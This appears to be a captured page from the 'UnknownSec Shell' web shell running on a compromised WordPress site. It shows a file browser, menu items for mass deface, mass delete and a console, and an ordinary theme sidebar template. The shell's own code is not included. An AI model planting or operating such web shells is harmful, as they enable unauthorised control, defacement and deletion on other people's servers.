shell bypass 403
UnknownSec Shell
:
/
home
/
akwariom
/
www
/
wp-content
/
themes
/
zillah
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
sidebar.php
<?php /** * The sidebar containing the main widget area. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package zillah */ $zillah_sidebar_show = get_theme_mod( 'zillah_sidebar_show', false ); if ( ! is_active_sidebar( 'zillah-sidebar-1' ) ) { return; } ?> <?php zillah_hook_sidebar_before(); ?> <aside id="secondary" class="widget-area<?php echo $zillah_sidebar_show === false && is_customize_preview() ? ' zillah-only-customizer' : ''; ?><?php echo $zillah_sidebar_show ? ' widget-area-mobile' : ''; ?>" role="complementary"> <?php if ( $zillah_sidebar_show ) { echo '<span class="sidebar-mobile-title"><span>' . esc_html__( 'Sidebar', 'zillah' ) . '</span></span>'; } ?> <div class="sidebar-inner-wrap"> <?php zillah_hook_sidebar_top(); ?> <?php dynamic_sidebar( 'zillah-sidebar-1' ); ?> <?php zillah_hook_sidebar_bottom(); ?> </div> </aside><!-- #secondary --> <?php zillah_hook_sidebar_after(); ?>
© 2026 UnknownSec